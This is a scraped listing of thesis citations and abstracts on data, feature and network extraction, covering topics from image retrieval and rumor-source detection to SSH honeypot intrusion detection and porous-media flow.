Detta examensarbete utforskar huruvida representationer som extraherats ur en förtränad djup CNN kan användas i innehållsbaserad bildhämtning för bilder i nyhetsartiklar. Branschen letar ständigt efter förbättrade metoder för bildhämtning, inte minst företaget som detta forskningsprojekt har utförts på, som vill förbättra sin befintliga bildbeskrivningsbaserade metod för bildhämtning. Det har visats att aktiveringarna från en bild i ett neuralt nätverk kan användas som en beskrivning av bildens visuella innehåll (features). Denna studie undersöker användbarheten av dessa features i ett bildlikhetssammanhang. Ett experiment med syfte att utvärdera den nya modellens prestanda utförs genom en jämförelse av svaren i en bildlikhetsundersökning, innehållande lösningar gjorda av människor. Den nya modellen får 72,5% på undersökningen, vilket överträffar den existerande bildbeskrivningsbaserade metoden som bara uppnådde ett resultat på 37,5%. Diskussioner om resultat, designval samt förslag till ytterligare förbättringar av utförandet presenteras i de senare delarna av rapporten.
APA, Harvard, Vancouver, ISO, and other styles
28

Mamidanna, Pranav. "Optimizing Neural Source Extraction Algorithms: A Performance Measure Based on Neuronal Network Properties." Thesis, KTH, Numerisk analys, NA, 2017. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-210052.

Full text
Abstract:
Extracting neural activity from electrophysiological and calcium All existing automated algorithms for this purpose, however, rely heavily on manual intervention and parameter tuning. In this thesis, we introduce a novel performance measure based on well-founded notions of neuronal network organization. This enables us to systematically tune parameters, using techniques from statistical design of experiments and response surface methods. We implement this framework on an algorithm used to extract neural activity from microendoscopic calcium imaging datasets, and demonstrate that this greatly reduces manual intervention.
Extraktion av neuronal aktivitet från elektrofysiologiska och kalciumavbildningsmätningar utgör ett viktigt problem inom neurovetenskapen. Alla existerande automatiska algoritmer för detta ändamål beror dock i dagsläget på manuell handpåläggning och parameterinställning. I detta examensarbete presenterar vi ett nytt prestandamått baserat på välgrundade begrepp rörande organisationen av neuronala nätverk. Detta möjliggör en systematisk parameterinställning genom att använda tekniker från statistisk experimentdesign och response surface-metoder. Vi har implementerat detta ramverk för en algoritm som används för att extrahera neuronal aktivitet från mikroendoskopisk kalciumavbildningsdata och visar att detta förfarande avsevärt minskar behovet av manuell inblandning.
APA, Harvard, Vancouver, ISO, and other styles
29

Choi, Hyunjong. "Medical Image Registration Using Artificial Neural Network." DigitalCommons@CalPoly, 2015. https://digitalcommons.calpoly.edu/theses/1523.

Full text
Abstract:
Image registration is the transformation of different sets of images into one coordinate system in order to align and overlay multiple images. Image registration is used in many fields such as medical imaging, remote sensing, and computer vision. It is very important in medical research, where multiple images are acquired from different sensors at various points in time. This allows doctors to monitor the effects of treatments on patients in a certain region of interest over time. In this thesis, artificial neural networks with curvelet keypoints are used to estimate the parameters of registration. Simulations show that the curvelet keypoints provide more accurate results than using the Discrete Cosine Transform (DCT) coefficients and Scale Invariant Feature Transform (SIFT) keypoints on rotation and scale parameter estimation.
APA, Harvard, Vancouver, ISO, and other styles
30

Trigueiros, Duarte. "Neural network based methods in the extraction of knowledge from accounting and financial data." Thesis, University of East Anglia, 1991. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.292217.

Full text
APA, Harvard, Vancouver, ISO, and other styles
31

Zaman, Tauhid R. "Information extraction with network centralities : finding rumor sources, measuring influence, and learning community structure." Thesis, Massachusetts Institute of Technology, 2011. http://hdl.handle.net/1721.1/70410.

Full text
Abstract:
Thesis (Ph. D.)--Massachusetts Institute of Technology, Dept. of Electrical Engineering and Computer Science, 2011.
Cataloged from PDF version of thesis.
Includes bibliographical references (p. 193-197).
Network centrality is a function that takes a network graph as input and assigns a score to each node. In this thesis, we investigate the potential of network centralities for addressing inference questions arising in the context of large-scale networked data. These questions are particularly challenging because they require algorithms which are extremely fast and simple so as to be scalable, while at the same time they must perform well. It is this tension between scalability and performance that this thesis aims to resolve by using appropriate network centralities. Specifically, we solve three important network inference problems using network centrality: finding rumor sources, measuring influence, and learning community structure. We develop a new network centrality called rumor centrality to find rumor sources in networks. We give a linear time algorithm for calculating rumor centrality, demonstrating its practicality for large networks. Rumor centrality is proven to be an exact maximum likelihood rumor source estimator for random regular graphs (under an appropriate probabilistic rumor spreading model). For a wide class of networks and rumor spreading models, we prove that it is an accurate estimator. To establish the universality of rumor centrality as a source estimator, we utilize techniques from the classical theory of generalized Polya's urns and branching processes. Next we use rumor centrality to measure influence in Twitter. We develop an influence score based on rumor centrality which can be calculated in linear time. To justify the use of rumor centrality as the influence score, we use it to develop a new network growth model called topological network growth. We find that this model accurately reproduces two important features observed empirically in Twitter retweet networks: a power-law degree distribution and a superstar node with very high degree. Using these results, we argue that rumor centrality is correctly quantifying the influence of users on Twitter. These scores form the basis of a dynamic influence tracking engine called Trumor which allows one to measure the influence of users in Twitter or more generally in any networked data. Finally we investigate learning the community structure of a network. Using arguments based on social interactions, we determine that the network centrality known as degree centrality can be used to detect communities. We use this to develop the leader-follower algorithm (LFA) which can learn the overlapping community structure in networks. The LFA runtime is linear in the network size. It is also non-parametric, in the sense that it can learn both the number and size of communities naturally from the network structure without requiring any input parameters. We prove that it is very robust and learns accurate community structure for a broad class of networks. We find that the LFA does a better job of learning community structure on real social and biological networks than more common algorithms such as spectral clustering.
by Tauhid R. Zaman.
Ph.D.
APA, Harvard, Vancouver, ISO, and other styles
32

Ben, slimen Yosra. "Knowledge extraction from huge volume of heterogeneous data for an automated radio network management." Thesis, Lyon, 2018. http://www.theses.fr/2018LYSE2046.

Full text
Abstract:
En vue d’aider les opérateurs mobiles avec la gestion de leurs réseaux d’accès radio, trois modèles sont proposés. Le premier modèle est une approche supervisée pour une prévention des anomalies. Son objectif est de détecter les dysfonctionnements futurs d’un ensemble de cellules en observant les indicateurs clés de performance considérés comme des données fonctionnelles. Par conséquent, en alertant les ingénieurs et les réseaux auto-organisés, les opérateurs mobiles peuvent être sauvés d’une dégradation de performance de leurs réseaux. Le modèle a prouvé son efficacité avec une application sur données réelles qui vise à détecter la dégradation de capacité, les problèmes d’accessibilités et les coupures d’appel dans des réseaux LTE.A cause de la diversité des technologies mobiles, le volume de données qui doivent être quotidiennement observées par les opérateurs mobiles devient énorme. Ce grand volume a devenu un obstacle pour la gestion des réseaux mobiles. Le second modèle vise à fournir une représentation simplifiée des indicateurs clés de performance pour une analyse plus facile. Du coup, un modèle de classification croisée pour données fonctionnelles est proposé. L’algorithme est basé sur un modèle de blocs latents dont chaque courbe est identifiée par ses composantes principales fonctionnelles. Ces dernières sont modélisées par une distribution Gaussienne dont les paramètres sont spécifiques à chaque bloc. Les paramètres sont estimés par un algorithme EM stochastique avec un échantillonnage de Gibbs. Ce modèle est le premier modèle de classification croisée pour données fonctionnelles et il a prouvé son efficacité sur des données simulées et aussi sur une application réelle qui vise à aider dans l’optimisation de la topologie des réseaux mobiles 4G.Le troisième modèle vise à résumer l’information issue des indicateurs clés de performance et aussi des alarmes réseaux. Un modèle de classification croisée des données mixtes : fonctionnelles et binaires est alors proposé. L’approche est basé sur un modèle de blocs latents et trois algorithmes sont comparés pour son inférence : EM stochastique avec un échantillonneur de Gibbs, EM de classification et EM variationnelle. Le modèle proposé est le premier algorithme de classification croisée pour données fonctionnelles et binaires. Il a prouvé son efficacité sur des données simulées et sur des données réelles extraites à partir de plusieurs réseaux mobiles 4G
In order to help the mobile operators with the management of their radio access networks, three models are proposed. The first model is a supervised approach for mobile anomalies prevention. Its objective is to detect future malfunctions of a set of cells, by only observing key performance indicators (KPIs) that are considered as functional data. Thus, by alerting the engineers as well as self-organizing networks, mobile operators can be saved from a certain performance degradation. The model has proven its efficiency with an application on real data that aims to detect capacity degradation, accessibility and call drops anomalies for LTE networks.Due to the diversity of mobile network technologies, the volume of data that has to be observed by mobile operators in a daily basis became enormous. This huge volume became an obstacle to mobile networks management. The second model aims to provide a simplified representation of KPIs for an easier analysis. Hence, a model-based co-clustering algorithm for functional data is proposed. The algorithm relies on the latent block model in which each curve is identified by its functional principal components that are modeled by a multivariate Gaussian distribution whose parameters are block-specific. These latter are estimated by a stochastic EM algorithm embedding a Gibbs sampling. This model is the first co-clustering approach for functional data and it has proven its efficiency on simulated data and on a real data application that helps to optimize the topology of 4G mobile networks.The third model aims to resume the information of data issued from KPIs and also alarms. A model-based co-clustering algorithm for mixed data, functional and binary, is therefore proposed. The approach relies on the latent block model, and three algorithms are compared for its inference: stochastic EM within Gibbs sampling, classification EM and variational EM. The proposed model is the first co-clustering algorithm for mixed data that deals with functional and binary features. It has proven its efficiency on simulated data and on real data extracted from live 4G mobile networks
APA, Harvard, Vancouver, ISO, and other styles
33

Blamey, Benjamin. "Lifelogging with SAESNEG : a system for the automated extraction of social network event groups." Thesis, Cardiff Metropolitan University, 2015. http://hdl.handle.net/10369/7859.

Full text
Abstract:
This thesis presents SAESNEG, a System for the Automated Extraction of Social Network Event Groups; a pipeline for the aggregation of the personal social media footprint, and its partitioning into events, the event clustering problem. SAESNEG facilitates a reminiscence-friendly user experience, where the user is able to navigate their social media footprint. A range of socio-technical issues are explored: the challenges to reminiscence, lifelogging, ownership, and digital death. Whilst previous systems have focused on the organisation of a single type of data, such as photos or Tweets respectively; SAESNEG handles a variety of types of social network documents found in a typical footprint (e.g. photos, Tweets, check-ins), with a variety of image, text and other metadata di erently heterogeneous data; adapted to sparse, private events typical of the personal social media footprint. Phase A extracts information, focusing on natural language processing; new techniques are developed; including a novel distributed approach to handling temporal expressions, and a parser for social events (such as birthdays). Information is also extracted from image and metadata, the resultant annotations feeding the subsequent event clustering. Phase B performs event clustering through the application of a number of pairwise similarity strategies a mixture of new and existing algorithms. Clustering itself is achieved by combining machine-learning with correlation clustering. The main contributions of this thesis are the identi cation of the technical research task (and the associated social need), the development of novel algorithms and approaches, and the integration of these with existing algorithms to form the pipeline. Results demonstrate SAESNEG's capability to perform event clustering on a di erently heterogeneous dataset, enabling users to achieve lifelogging in the context of their existing social media networks.
APA, Harvard, Vancouver, ISO, and other styles
34

Münch, Felix Victor. "Measuring the networked public: Exploring network science methods for large scale online media studies." Thesis, Queensland University of Technology, 2019. https://eprints.qut.edu.au/125543/1/Felix%20M%C3%BCnch%20Thesis.pdf.

Full text
Abstract:
This thesis explores network science methods and media and communication theory to investigate structures and dynamics of national and global publics. It does so in two studies: one regarding the sharing of hashtags and links on Twitter around acute events, such as the Sydney Siege; the other about communities, publics, and possible echo chambers in the Australian Twitter follower network. It leads to new evidence about structures and dynamics within communities and the public sphere on Twitter, revealing the epistemological implications of network analysis algorithms and outlining a methodological framework to better connect media and communication studies with network science.
APA, Harvard, Vancouver, ISO, and other styles
35

Rabadia, Priya Naran. "Extraction of patterns in selected network traffic for a precise and efficient intrusion detection approach." Thesis, Edith Cowan University, Research Online, Perth, Western Australia, 2018. https://ro.ecu.edu.au/theses/2142.

Full text
Abstract:
This thesis investigates a precise and efficient pattern-based intrusion detection approach by extracting patterns from sequential adversarial commands. As organisations are further placing assets within the cyber domain, mitigating the potential exposure of these assets is becoming increasingly imperative. Machine learning is the application of learning algorithms to extract knowledge from data to determine patterns between data points and make predictions. Machine learning algorithms have been used to extract patterns from sequences of commands to precisely and efficiently detect adversaries using the Secure Shell (SSH) protocol. Seeing as SSH is one of the most predominant methods of accessing systems it is also a prime target for cyber criminal activities. For this study, deep packet inspection was applied to data acquired from three medium interaction honeypots emulating the SSH service. Feature selection was used to enhance the performance of the selected machine learning algorithms. A pre-processing procedure was developed to organise the acquired datasets to present the sequences of adversary commands per unique SSH session. The preprocessing phase also included generating a reduced version of each dataset that evenly and coherently represents their respective full dataset. This study focused on whether the machine learning algorithms can extract more precise patterns efficiently extracted from the reduced sequence of commands datasets compared to their respective full datasets. Since a reduced sequence of commands dataset requires less storage space compared to the relative full dataset. Machine learning algorithms selected for this study were the Naïve Bayes, Markov chain, Apriori and Eclat algorithms The results show the machine learning algorithms applied to the reduced datasets could extract additional patterns that are more precise, compared to their respective full datasets. It was also determined the Naïve Bayes and Markov chain algorithms are more efficient at processing the reduced datasets compared to their respective full datasets. The best performing algorithm was the Markov chain algorithm at extracting more precise patterns efficiently from the reduced datasets. The greatest improvement in processing a reduced dataset was 97.711%. This study has contributed to the domain of pattern-based intrusion detection by providing an approach that can precisely and efficiently detect adversaries utilising SSH communications to gain unauthorised access to a system.
APA, Harvard, Vancouver, ISO, and other styles
36

Desai, Urvashi. "Student Interaction Network Analysis on Canvas LMS." Miami University / OhioLINK, 2020. http://rave.ohiolink.edu/etdc/view?acc_num=miami1588339724934746.

Full text
APA, Harvard, Vancouver, ISO, and other styles
37

González, Fernández Ernesto. "Low-power techniques for wireless gas sensing network applications: pulsed light excitation with data extraction strategies." Doctoral thesis, Universitat Rovira i Virgili, 2021. http://hdl.handle.net/10803/672792.

Full text
Abstract:
Aquesta tesi està enfocada en dues línies d'investigació. La primera aborda el desenvolupament d'una metodologia basada en llum polsada per modulació de sensors químic-resistius per a l'extracció d'informació del senyal transitòri, i la segona planteja la implementació d'una xarxa sense fils de sensors (WSN) basada en tecnologia LoRa per al monitoratge de la qualitat de l'aire (AQM) i la detecció d'esdeveniments de fuita de gasos. Aquest document està estructurat en quatre capítols organitzats de la següent manera: el Capítol 1 presenta l'estat de l'art, una introducció als mecanismes de millora de l'comportament dels sensors químic-resistius, així com una introducció a la implementació de xarxes sense fils de sensors per a la monitorització de la qualitat de l'aire; el Capítol 2 està compost pels dos articles publicats relacionats amb la metodologia basada en la modulació utilitzant llum polsada per a l'extracció d'informació del senyal transitòria de sensors químic-resistius; el Capítol 3 presenta l'article publicat relacionat amb la implementació d'una WSN per a AQM; el Capítol 4 presenta les conclusions derivades dels resultats obtinguts durant el desenvolupament de el projecte de tesi i les recomanacions per al treball futur associat a la continuïtat dels principals resultats d'aquesta tesi
La presente tesis está enfocada en dos líneas de investigación, La primera aborda el desarrollo de una metodología basada en luz pulsada para modulación de sensores químico-resistivos para la extracción de información de la señal transitoria; y la segunda plantea la implementación de una red inalámbrica de sensores (WSN) basada en tecnología LoRa para la monitorización de la calidad del aire (AQM) y la detección de eventos de fuga de gases. Este documento está estructurado en cuatro capítulos organizados de la siguiente forma: el Capítulo 1 presenta el estado del arte, una introducción a los mecanismos de mejora del comportamiento de los sensores químico-resistivos, así como una introducción a la implementación de redes inalámbricas de sensores para la monitorización de la calidad del aire; el Capítulo 2 está compuesto por los dos artículos publicados relacionados con la metodología basada en la modulación utilizando luz pulsada para la extracción de información de la señal transitoria de sensores químico-resistivos; el Capítulo 3 presenta el artículo publicado relacionado con la implementación de una WSN para AQM; el Capítulo 4 presenta las conclusiones derivadas de los resultados obtenidos durante el desarrollo de el proyecto de tesis y las recomendaciones para el trabajo futuro asociado a la continuidad de los principales resultados de esta tesis.
The present thesis project is focused in two different yet related research lines. The first one addresses the development of a pulsed light-based chemiresistive sensor modulation methodology for transient information extraction. The second research line developed deals with the implementation of a LoRa-based portable, scalable, low-cost, and low power Wireless Sensor Network (WSN) for Air Quality Monitoring (AQM) and gas leakage events detection. This document is structured in four Chapters organized as follows: Chapter 1 presents the state of the art, an introduction to sensing performance enhancement and transient data extraction methods, as well as an introduction to the implementation of WSN for AQM; Chapter 2 is composed of the two published paper related to the pulsed light modulation methodology for transient information extraction; Chapter 3 presents the published paper related to the implementation of a LoRa-based WSN for AQM; Chapter 4 states the conclusions derived from the results obtained during this thesis project and the recommendations for the future work associated to the continuity of this thesis findings.
APA, Harvard, Vancouver, ISO, and other styles
38

Fernandez, Marie. "Extraction et analyse du réseau acoustique d'oiseaux sociaux." Thesis, Lyon, 2018. http://www.theses.fr/2018LYSEI030.

Full text
Abstract:
Posséder des données fiables, à jour et précises sur les populations d’oiseaux peut se révéler central aux décisions de politique environnementale. La bioacoustique est un outil de suivi non invasif de populations animales et avantageux lorsque les méthodes d’observation ou les captures sont difficiles. De plus, il a été montré chez de nombreuses espèces que l'étude de la communication acoustique peut largement contribuer à comprendre la dynamique des interactions sociales au sein d'un groupe. Cependant, l'étude des interactions vocales peut se révéler difficile, notamment lorsque l'on souhaite s'intéresser à une échelle fine des échanges. C'est pourquoi la bioacoustique n’a que peu été utilisée pour la caractérisation de la structure sociale de populations. L'objectif de ce projet de thèse était le développement de techniques d’extraction de vocalisations individuelles au sein d'un groupe, ainsi que la modélisation de leur dynamique fine. Après avoir été développée, testée et validée, notre méthode a permis d'étudier le réseau acoustique chez une espèce d'oiseau social, le diamant mandarin, et d'explorer le lien entre réseau acoustique et réseau social. A travers plusieurs études, nous avons montré que la dynamique vocale d'un groupe dépend à la fois de la composition de ce groupe (sa taille, la présence de couples ou de juvéniles) et du contexte environnemental (sans perturbation, puis avec séparation visuelle ou présence d'un danger). Ainsi, avec le développement de méthodes d'extraction de réseau acoustique, ce projet contribue à la fois à la recherche fondamentale et appliquée dans ce domaine : en recherche fondamentale car l'étude de la dynamique des interactions vocales permet de mieux comprendre le réseau social, et en recherche appliquée pour le suivi de population.!
Bird populations represent a significant proportion of urban and rural biodiversity. For this purpose, the acquisition of reliable, updated and precise data on bird population can be a central factor for environmental decisions. The current classical techniques are difficult regarding human resources (banding, tracking, counting) and often invasive. Bioacoustics is a non-invasive tool for animal populations monitoring (density, migration paths...). Moreover, it has been shown in many species that the study of vocal exchanges can largely help to understand the social interactions occurring in a group. However, studying vocal exchanges can be difficult, especially when we want to assess fine scale interactions. For this reason bioacoustics have rarely been used to characterize groups’ social structure. The aim of this project was to develop techniques for the extraction of individual vocalizations in a group, and the modelling of their dynamics at a fine scale. After we developed, tested and validated our method, we used it to extract the acoustic network in a bird social species, the zebra finch, and investigate the link between acoustic and social network. Throughout different studies we showed that the group composition, more particularly its size, the presence of couples or the presence of juveniles can shape parts of the vocal dynamics. We also found that the environmental context (without any perturbation, then a context of separation for a couple, or predation in a group) can impact the vocal interactions dynamics. Thus, this project make contribution to both fundamental and applied research: in fundamental research by contributing to the study of vocal interactions dynamics to better understand the social network, and in applied research by contributing to define new standards for population monitoring
APA, Harvard, Vancouver, ISO, and other styles
39

Roberts, David James. "Applications of Artificial Neural Networks to Synthetic Aperture Radar for Feature Extraction in Noisy Environments." DigitalCommons@CalPoly, 2013. https://digitalcommons.calpoly.edu/theses/996.

Full text
Abstract:
It is often that images generated from Synthetic Aperture Radar (SAR) are noisy, distorted, or incomplete pictures of a target or target region. As the goal for most SAR research pertains to automatic target recognition (ATR), extensive filtering and image processing is required in order to extract the features necessary to carry out ATR. This thesis investigates the use of Artificial Neural Networks (ANNs) in order to improve upon the feature extraction process by laying the foundation for ANN SAR ATR algorithms and programs. The first technique investigated is that of an ANN edge detector designed to be invariant to multiplicative speckle noise. The algorithm designed uses the Back Propagation (BP) algorithm to teach a multi-layer perceptron network to detect edges. In order to do so, several parameters within a Sliding Window (SW), are calculated as the inputs to the ANN. The ANN then outputs an edge map that includes the outer edge features of the target as well as some internal edge features. The next technique that is examined is a pattern recognition and target reconstruction algorithm based off of the associative memory ANN known as the Hopfield Network (HN). For this version of the HN, the network is trained with a collection of varying geometric shapes. The output of the network is a nearest-fit representation of the incomplete image data input. Because of the versatility of this program, it is also able to reconstruct incomplete 3D models determined from SAR data. The final technique investigated is an automatic rotation procedure to detect the change in perspective relative to the platform. This type of detection can prove useful if used for target tracking or 3D modeling where the direction vector or relative angle of the target is a desired piece of information.
APA, Harvard, Vancouver, ISO, and other styles
40

Guillén, Alejandro. "Implementation of a Distributed Algorithm for Multi-camera Visual Feature Extraction in a Visual Sensor Network Testbed." Thesis, KTH, Kommunikationsnät, 2015. http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-167415.

Full text
Abstract:
Visual analysis tasks, like detection, recognition and tracking, are com- putationally intensive, and it is therefore challenging to perform such tasks in visual sensor networks, where nodes may be equipped with low power CPUs. A promising solution is to augment the sensor network with pro- cessing nodes, and to distribute the processing tasks among the process- ing nodes of the visual sensor network. The objective of this project is to enable a visual sensor network testbed to operate with multiple cam- era sensors, and to implement an algorithm that computes the allocation of the visual feature tasks to the processing nodes. In the implemented system, the processing nodes can receive and process data from differ- ent camera sensors simultaneously. The acquired images are divided into sub-images, the sizes of the sub-images are computed through solving a linear programming problem. The implemented algorithm performs local optimization in each camera sensor without data exchange with the other cameras in order to minimize the communication overhead and the data computational load of the camera sensors. The implementation work is performed on a testbed that consists of BeagleBone Black computers with IEEE 802.15.4 or IEEE 802.11 USB modules, and the existing code base is written in C++. The implementation is used to assess the performance of the distributed algorithm in terms of completion time. The results show a good performance providing lower average completion time.
APA, Harvard, Vancouver, ISO, and other styles
41

Rahimzadeh, Sheida, Veronica Ramirez, and Elizabeth Hall-Lipsy. "Evaluating Practice-Based Research Network (PBRN) Websites Using an Information Extraction Form and Interviews of Website Webmasters." The University of Arizona, 2013. http://hdl.handle.net/10150/614273.

Full text
Abstract:
Class of 2013 Abstract
Specific Aims: To evaluate and describe the Agency for Healthcare Research and Quality (AHRQ) affiliated practice-based research network (PBRN) websites to determine the best qualities regarding format, content, and accessibility using a developed PBRN website information extraction form. Methods: A PBRN information extraction form was developed to assess the format, content, and accessibility of each AHRQ-affiliated PBRN website. Each student investigator completed an electronic copy of the extraction form for each PBRN website to confirm consistency of findings. A phone interview was then conducted with the webmasters of the PBRNs with the highest scores to determine the influences and challenges those webmasters faced during the development of their PBRN websites. Main Results: The information extraction form was completed for each of the 104 active PBRN websites in the U.S. The most common elements seen on the PBRN websites were site map, email address, mission statement, phone number, and search toolbar. The inter-rater agreement between the two student investigators for the data collected was 84 percent. Regarding the webmaster interviews, the majority of the webmasters believed that the single most important factor in creating a successful PBRN website was identifying the audience of the PBRN and making the material appropriate for that audience. Conclusion: The developed information extraction form was used to successfully evaluate and describe the AHRQ-affiliated PBRN websites. Audience identification is important in order to provide appropriate content, as well as in the development of an effective PBRN website.
APA, Harvard, Vancouver, ISO, and other styles
42

Baychev, Todor. "Pore space structure effects on flow in porous media." Thesis, University of Manchester, 2018. https://www.research.manchester.ac.uk/portal/en/theses/pore-space-structure-effects-on-flow-in-porous-media(5542173d-d6d1-4768-9f38-4b41254fa194).html.

Full text
Abstract:
Fluid flow in porous media is important for a number of fields including nuclear waste disposal, oil and gas, fuel cells, water treatment and civil engineering. The aim of this work is to improve the current understanding of how the pore space governs the fluid flow in porous media in the context of nuclear waste disposal. The effects of biofilm formation on flow are also investigated. The thesis begins with a review of the current porous media characterisation techniques and the means for converting the pore space into pore network models and their existing applications. Further, I review the current understanding of biofilm lifecycle in the context of porous media and its interactions with fluid flow. The model porous media used in this project is Hollington sandstone. The pore space of the material is characterised by X-ray CT and the equivalent pore networks from two popular pore network extraction algorithms are compared comprehensively. The results indicate that different pore network extraction algorithms could interpret the same pore space rather differently. Despite these differences, the single-phase flow properties of the extracted networks are in good agreement with the estimates from a direct approach. However, it is recommended that any flow or transport study using pore network modelling should entail a sensitivity study aiming to determine if the model results are extraction method specific. Following these results, a pore merging algorithm is introduced aimed to improve the over segmentation of long throats and hence improve the quality of the extracted statistics. The improved model is used to study quantitatively the pore space evolution of shale rock during pyrolysis. Next, the extracted statistics from one of the algorithms is used to explore the potential of regular pore network models for up-scaling the flow properties of porous materials. Analysis showed that the anisotropic flow properties observed in the irregular models are due to the different number of red (critical) features present along the flow direction. This observation is used to construct large regular models that can mimic that behaviour and to discuss the potential of estimating the flow properties of porous media based on their isotropic and anisotropic properties. Finally, a long-term flow-through column experiment is conducted aiming to understand the effects of bacterial colonisation on flow in Hollington sandstone. The results show that such systems are quite complex and are susceptible to perturbations. The flow properties of the sandstone were reduced significantly during the course of the experiment. The possible mechanisms responsible for the observed reductions in permeability are discussed and the need for developing new imaging techniques that can allow examining biofilm development in-situ is underlined as necessary for drawing more definitive conclusions.
APA, Harvard, Vancouver, ISO, and other styles
43

Diesner, Jana. "Uncovering and Managing the Impact of Methodological Choices for the Computational Construction of Socio-Technical Networks from Texts." Research Showcase @ CMU, 2012. http://repository.cmu.edu/dissertations/194.

Full text
Abstract:
This thesis is motivated by the need for scalable and reliable methods and technologies that support the construction of network data based on information from text data. Ultimately, the resulting data can be used for answering substantive and graph-theoretical questions about socio-technical networks. One main limitation with constructing network data from text data is that the validation of the resulting network data can be hard to infeasible, e.g. in the cases of covert, historical and large-scale networks. This thesis addresses this problem by identifying the impact of coding choices that must be made when extracting network data from text data on the structure of networks and network analysis results. My findings suggest that conducting reference resolution on text data can alter the identity and weight of 76% of the nodes and 23% of the links, and can cause major changes in the value of commonly used network metrics. Also, performing reference resolution prior to relation extraction leads to the retrieval of completely different sets of key entities in comparison to not applying this pre-processing technique. Based on the outcome of the presented experiments, I recommend strategies for avoiding or mitigating the identified issues in practical applications. When extracting socio-technical networks from texts, the set of relevant node classes might go beyond the classes that are typically supported by tools for named entity extraction. I address this lack of technology by developing an entity extractor that combines an ontology for sociotechnical networks that originates from the social sciences, is theoretically grounded and has been empirically validated in prior work, with a supervised machine learning technique that is based on probabilistic graphical models. This thesis does not stop at showing that the resulting prediction models achieve state of the art accuracy rates, but I also describe the process of integrating these models into an existing and publically available end-user product. As a result, users can apply these models to new text data in a convenient fashion. While a plethora of methods for building network data from information explicitly or implicitly contained in text data exists, there is a lack of research on how the resulting networks compare with respect to their structure and properties. This also applies to networks that can be extracted by using the aforementioned entity extractor as part of the relation extraction process. I address this knowledge gap by comparing the networks extracted by using this process to network data built with three alternative methods: text coding based on thesauri that associate text terms with node classes, the construction of network data from meta-data on texts, such as key words and index terms, and building network data in collaboration with subject matter experts. The outcomes of these comparative analyses suggest that thesauri generated with the entity extractor developed for this thesis need adjustments with respect to particular categories and types of errors. I am providing tools and strategies to assist with these refinements. My results also show that once these changes have been made and in contrast to manually constructed thesauri, the prediction models generalize with acceptable accuracy to other domains (news wire data, scientific writing, emails) and writing styles (formal, casual). The comparisons of networks constructed with different methods show that ground truth data built by subject matter experts are hardly resembled by any automated method that analyzes text bodies, and even less so by exploiting existing meta-data from text corpora. Thus, aiming to reconstruct social networks from text data leads to largely incomplete networks. Synthesizing the findings from this work, I outline which types of information on socio-technical networks are best captured by what network data construction method, and how to best combine these methods in order to gain a more comprehensive view on a network. When both, text data and relational data, are available as a source of information on a network, people have previously integrated these data by enhancing social networks with content nodes that represent salient terms from the text data. I present a methodological advancement to this technique and test its performance on the datasets used for the previously mentioned evaluation studies. By using this approach, multiple types of behavioral data, namely interactions between people as well as their language use, can be taken into account. I conclude that extracting content nodes from groups of structurally equivalent agents can be an appropriate strategy for enabling the comparison of the content that people produce, perceive or disseminate. These equivalence classes can represent a variety of social roles and social positions that network members occupy. At the same time, extracting content nodes from groups of structurally coherent agents can be suitable for enabling the enhancement of social networks with content nodes. The results from applying the latter approach to text data include a comparison of the outcome of topic modeling; an efficient and unsupervised information extraction technique, to the outcomes of alternative methods, including entity extraction based on supervised machine learning. My findings suggest that key entities from meta-data knowledge networks might serve as proper labels for unlabeled topics. Also, unsupervised and supervised learning leads to the retrieval of similar entities as highly likely members of highly likely topics, and key nodes from text-based knowledge networks, respectively. In summary, the contributions made with this thesis help people to collect, manage and analyze rich network data at any scale. This is a precondition for asking substantive and graph-theoretical questions, testing hypotheses, and advancing theories about networks. This thesis uses an interdisciplinary and computationally rigorous approach to work towards this goal; thereby advancing the intersection of network analysis, natural language processing and computing.
APA, Harvard, Vancouver, ISO, and other styles
44

Abdulrahman, Ruqayya. "Multi agent system for web database processing, on data extraction from online social networks." Thesis, University of Bradford, 2012. http://hdl.handle.net/10454/5502.

Full text
Abstract:
In recent years, there has been a flood of continuously changing information from a variety of web resources such as web databases, web sites, web services and programs. Online Social Networks (OSNs) represent such a field where huge amounts of information are being posted online over time. Due to the nature of OSNs, which offer a productive source for qualitative and quantitative personal information, researchers from various disciplines contribute to developing methods for extracting data from OSNs. However, there is limited research which addresses extracting data automatically. To the best of the author's knowledge, there is no research which focuses on tracking the real time changes of information retrieved from OSN profiles over time and this motivated the present work. This thesis presents different approaches for automated Data Extraction (DE) from OSN: crawler, parser, Multi Agent System (MAS) and Application Programming Interface (API). Initially, a parser was implemented as a centralized system to traverse the OSN graph and extract the profile's attributes and list of friends from Myspace, the top OSN at that time, by parsing the Myspace profiles and extracting the relevant tokens from the parsed HTML source files. A Breadth First Search (BFS) algorithm was used to travel across the generated OSN friendship graph in order to select the next profile for parsing. The approach was implemented and tested on two types of friends: top friends and all friends. In case of top friends, 500 seed profiles have been visited; 298 public profiles were parsed to get 2197 top friends' profiles and 2747 friendship edges, while in case of all friends, 250 public profiles have been parsed to extract 10,196 friends' profiles and 17,223 friendship edges. This approach has two main limitations. The system is designed as a centralized system that controlled and retrieved information of each user's profile just once. This means that the extraction process will stop if the system fails to process one of the profiles; either the seed profile (first profile to be crawled) or its friends. To overcome this problem, an Online Social Network Retrieval System (OSNRS) is proposed to decentralize the DE process from OSN through using MAS. The novelty of OSNRS is its ability to monitor profiles continuously over time. The second challenge is that the parser had to be modified to cope with changes in the profiles' structure. To overcome this problem, the proposed OSNRS is improved through use of an API tool to enable OSNRS agents to obtain the required fields of an OSN profile despite modifications in the representation of the profile's source web pages. The experimental work shows that using API and MAS simplifies and speeds up the process of tracking a profile's history. It also helps security personnel, parents, guardians, social workers and marketers in understanding the dynamic behaviour of OSN users. This thesis proposes solutions for web database processing on data extraction from OSNs by the use of parser and MAS and discusses the limitations and improvements.
APA, Harvard, Vancouver, ISO, and other styles
45

Hwang, Sungkun. "Predicting reliability in multidisciplinary engineering systems under uncertainty." Thesis, Georgia Institute of Technology, 2016. http://hdl.handle.net/1853/54955.

Full text
Abstract:
